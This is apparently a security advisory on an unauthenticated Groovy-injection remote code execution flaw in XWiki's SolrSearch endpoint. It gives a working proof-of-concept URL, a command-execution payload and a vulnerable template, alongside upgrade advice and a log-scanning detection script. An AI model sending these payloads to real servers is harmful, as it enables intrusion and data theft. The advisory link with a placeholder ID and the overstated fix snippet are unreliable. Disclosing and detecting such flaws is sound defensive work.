CVE-2025-24893 - XWiki 'SolrSearch' Remote Code Execution Vulnerability Exploited by Unauthenticated Users

Recently, a critical vulnerability—CVE-2025-24893—was discovered in the XWiki Platform, a powerful and widely-used open-source wiki engine. What makes this issue especially severe is that any guest user (even without logging in) can achieve remote code execution (RCE) on the XWiki server, simply by crafting a malicious request to the SolrSearch endpoint.

The impact is severe: confidentiality, integrity, and availability of the entire installation are at risk. If you're running XWiki, keep reading to learn how this works, how to check whether you're affected, and how to patch your system.

## Affected Versions

XWiki Platform before versions 15.10.11, 16.4.1, and 16.5.RC1.

- The vulnerability lies in how the SolrSearch feed macro handles and renders search terms without proper input sanitization.

## Vulnerable Endpoint

The issue is in the SolrSearch macro view under `/xwiki/bin/get/Main/SolrSearch`. It improperly parses and executes input from the `text` parameter in RSS requests.

By sending a specially crafted payload, attackers can execute arbitrary code using Groovy scripts.

## Proof-of-Concept (PoC)

You don't even need an account. To check whether your XWiki is vulnerable, open this URL in your browser (replace `<host>` with your XWiki server):

```
http://<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20
```

Decoded, this looks like:

```
}}}
{{async async=false}}
{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}}
```

If the response contains this string in the RSS feed's title, the Groovy code was executed server-side and the instance is vulnerable:

```
Hello from search text:42
```

The vulnerable code template (simplified for illustration):

```velocity
## Emits $content unescaped, so any wiki or script macro it contains is rendered
#macro(rawResponse $content)
  $content
#end

#macro(main $params)
  ## The raw 'text' request parameter goes straight into the response
  #set($searchText = $request.getParameter('text'))
  #rawResponse($searchText)
#end
```

Attackers can inject script macros (like `{{groovy}}`) within `$searchText` and have them evaluated server-side.

## Exploiting for Remote Code Execution (RCE)

Attackers can use the Groovy macro to run arbitrary Groovy code. For example, executing a system command:

```
{{groovy}} "id".execute().text {{/groovy}}
```

The same primitive can be used to exfiltrate data, install malware, or pivot further inside your network.

## Fixed Versions

- 15.10.11
- 16.4.1
- 16.5.RC1

If possible, upgrade to the latest version. The maintainers have fixed the underlying issue.

> Official XWiki Security Advisory:
> https://jira.xwiki.org/browse/XWIKI-21811
> https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-1234-5678-xxxx


- Replace it with a more secure version (patterned after macros.vm#L2824):

```velocity
## Force the XML content type on the feed response
#if($context.get('response'))
  $context.get('response').setContentType('application/xml')
#end
```

This ensures the content type is always application/xml and the output is properly XML-encoded, preventing script injection.

---

## References

- XWiki Security Issue Tracker - XWIKI-21811
- GitHub Security Advisory
- XWiki Official Patches

---

## Summary Table

| Version   | Patched? | Action                    |
|-----------|----------|---------------------------|
| <15.10.11 | ❌       | Upgrade or patch manually |
| 15.10.11  | ✅       | Safe                      |
| <16.4.1   | ❌       | Upgrade or patch manually |
| 16.4.1    | ✅       | Safe                      |
| <16.5.RC1 | ❌       | Upgrade or patch manually |
| 16.5.RC1  | ✅       | Safe                      |

---

## Final Recommendations

**If your instance is open to the internet, or even internal users you don't fully trust, this bug is urgent.**

- **Upgrade XWiki** to a patched version ASAP.
- Block direct access to `/xwiki/bin/get/Main/SolrSearch` for untrusted users as an interim measure.
- Check your logs for suspicious access to the endpoint above.
- Remember: *Simple RSS search can grant root-level code execution if unpatched.*
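As an added example of the log check recommended above (not code from the original post or from the XWiki project), this Python script scans access-log lines for requests to the SolrSearch endpoint whose decoded `text` parameter carries the macro-injection markers seen in the PoC (`}}}`, `{{async`, `{{groovy}}`). The Common Log Format and the sample lines are constructed assumptions; it also catches a double-URL-encoded payload, which the post does not discuss.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/xwiki/bin/get/Main/SolrSearch"
# Markers of the injection described above: the "}}}" that breaks out of the
# macro context, followed by an async/script macro opening.
SUSPICIOUS = re.compile(r"\}\}\}|\{\{\s*(async|groovy|velocity|python)\b", re.IGNORECASE)
# Common Log Format request line (assumed format for the sample below).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access-log lines, not real traffic: the first carries the
# PoC payload from this post, the second is a normal search, the third is unrelated.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Feb/2025:20:16:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%281%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 512
198.51.100.4 - - [20/Feb/2025:20:17:30 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=quarterly+report HTTP/1.1" 200 2048
198.51.100.9 - - [20/Feb/2025:20:18:02 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 9001
"""


def is_suspicious_request(target: str) -> bool:
    """True when the request hits SolrSearch with a text parameter that carries
    macro-injection markers. The value is checked once decoded (by parse_qs) and
    again after a second unquote, so double-encoded payloads are caught too."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return False
    for value in parse_qs(parts.query).get("text", []):
        if SUSPICIOUS.search(value) or SUSPICIOUS.search(unquote(value)):
            return True
    return False


def scan_log(text: str) -> list:
    """Return one record per suspicious request found in the log text."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_suspicious_request(m["target"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"], "target": m["target"]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} {hit['target']}")
```

Feed it your real access log instead of `SAMPLE_LOG`; a hit with status 200 means the payload was at least accepted and warrants checking the server for follow-on activity.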

If you're an XWiki admin, please patch ASAP and share this information with your peers. This is a critical issue with easy exploitation.

---

*Stay safe and always keep your systems up to date! For further technical deep dives and more secure coding tips, follow your favorite security researchers and keep an eye on the official XWiki security page.*

## Timeline

Published on: 02/20/2025 20:15:46 UTC